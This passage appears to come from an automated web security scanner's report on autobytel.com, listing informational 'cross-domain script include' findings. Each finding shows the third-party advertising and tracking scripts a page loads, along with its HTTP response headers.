<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=728x90;ptile=1;!cat=;ord=8791101?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=728x90;ptile=1;!cat=;ord=8791101?"></SCRIPT>
...[SNIP]...
68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=300x250;ptile=2;!cat=;ord=8791101?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/fms;abr=!ie;kw=fms;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=300x250;ptile=2;!cat=;ord=8791101?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=1x3;!cat=;ord=8791101?"></script>
...[SNIP]...
4F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=160x600;ptile=3;!cat=;ord=8791101?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=160x600;ptile=3;!cat=;ord=8791101?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.519. http://www.autobytel.com/car-financing.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-financing.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=728x90;ptile=1;!cat=;ord=44592567?
http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=160x600;ptile=2;!cat=;ord=44592567?
http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=1x3;!cat=;ord=44592567?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:46:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:55 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:46:55 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
91737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=728x90;ptile=1;!cat=;ord=44592567?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=728x90;ptile=1;!cat=;ord=44592567?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=1x3;!cat=;ord=44592567?"></script>
...[SNIP]...
737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=160x600;ptile=2;!cat=;ord=44592567?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=160x600;ptile=2;!cat=;ord=44592567?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.520. http://www.autobytel.com/car-incentives.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-incentives.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.rebates/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=728x90;ptile=1;!cat=;ord=22812529?
http://ad.doubleclick.net/adj/abtl.rebates/;abr=!ie;kw=;info=13148;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=160x600;ptile=2;!cat=;ord=22812529?
http://ad.doubleclick.net/adj/abtl.rebates/;kw=;info=13148;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=1x3;!cat=;ord=22812529?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=any&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:07 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:07 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33903

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
89624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=728x90;ptile=1;!cat=;ord=22812529?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.rebates/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=728x90;ptile=1;!cat=;ord=22812529?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.rebates/;kw=;info=13148;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=1x3;!cat=;ord=22812529?"></script>
...[SNIP]...
624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=160x600;ptile=2;!cat=;ord=22812529?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.rebates/;abr=!ie;kw=;info=13148;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=160x600;ptile=2;!cat=;ord=22812529?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=any&ins=no"></SCRIPT>
...[SNIP]...

21.521. http://www.autobytel.com/car-news.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-news.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=728x90;ptile=1;!cat=;ord=31788896?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=160x600;ptile=2;!cat=;ord=31788896?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=1x3;!cat=;ord=31788896?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 40861
Expires: Mon, 24 Jan 2011 23:47:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:58 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:58 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=728x90;ptile=1;!cat=;ord=31788896?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=728x90;ptile=1;!cat=;ord=31788896?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=1x3;!cat=;ord=31788896?"></script>
...[SNIP]...
9B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=160x600;ptile=2;!cat=;ord=31788896?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=160x600;ptile=2;!cat=;ord=31788896?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.522. http://www.autobytel.com/car-pictures.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-pictures.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=728x90;ptile=1;!cat=;ord=46630777?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=160x600;ptile=3;!cat=;ord=46630777?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=300x250;ptile=2;!cat=;ord=46630777?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=1x3;!cat=;ord=46630777?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:44:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:32 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:32 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43538

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=728x90;ptile=1;!cat=;ord=46630777?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=728x90;ptile=1;!cat=;ord=46630777?"></SCRIPT>
...[SNIP]...
D-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=300x250;ptile=2;!cat=;ord=46630777?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=300x250;ptile=2;!cat=;ord=46630777?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=1x3;!cat=;ord=46630777?"></script>
...[SNIP]...
8ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=160x600;ptile=3;!cat=;ord=46630777?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=160x600;ptile=3;!cat=;ord=46630777?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.523. http://www.autobytel.com/car-reviews.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-reviews.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=728x90;ptile=1;!cat=;ord=39086958?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=160x600;ptile=3;!cat=;ord=39086958?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=300x250;ptile=2;!cat=;ord=39086958?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=1x3;!cat=;ord=39086958?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:46:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:10 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:46:10 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49202

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=728x90;ptile=1;!cat=;ord=39086958?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=728x90;ptile=1;!cat=;ord=39086958?"></SCRIPT>
...[SNIP]...
B-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=300x250;ptile=2;!cat=;ord=39086958?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=300x250;ptile=2;!cat=;ord=39086958?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=1x3;!cat=;ord=39086958?"></script>
...[SNIP]...
3AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=160x600;ptile=3;!cat=;ord=39086958?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||483243AB-FEC5-2441-5ED60EDCE981D749|||13148|||;sz=160x600;ptile=3;!cat=;ord=39086958?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.524. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/finance/index.cfm/action/Calculator

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=728x90;ptile=1;!cat=;ord=86536114?
http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=160x600;ptile=2;!cat=;ord=86536114?
http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=1x3;!cat=;ord=86536114?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 35797
Expires: Mon, 24 Jan 2011 23:28:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:28:34 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:28:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:28:34 GMT;path=/
Set-Cookie: PV_CT=3;path=/



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=728x90;ptile=1;!cat=;ord=86536114?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=728x90;ptile=1;!cat=;ord=86536114?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=1x3;!cat=;ord=86536114?"></script>
...[SNIP]...
3D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=160x600;ptile=2;!cat=;ord=86536114?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||479113D3-C20A-EE7D-44A0DBDD3956CE5E|||13148|||;sz=160x600;ptile=2;!cat=;ord=86536114?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.525. http://www.autobytel.com/content/buy/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/index.cfm

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?

Request

Response

21.526. http://www.autobytel.com/content/buy/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/index.cfm

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47926A76-DD7B-EB7B-A8EEFACDC658640F|||13148|||;sz=728x90;ptile=1;!cat=;ord=9881368?

Request

Response

21.527. http://www.autobytel.com/content/buy/warranty/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/warranty/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=728x90;ptile=1;!cat=;ord=41947522?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=160x600;ptile=2;!cat=;ord=41947522?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=1x3;!cat=;ord=41947522?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:42 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=728x90;ptile=1;!cat=;ord=41947522?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=728x90;ptile=1;!cat=;ord=41947522?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=1x3;!cat=;ord=41947522?"></script>
...[SNIP]...
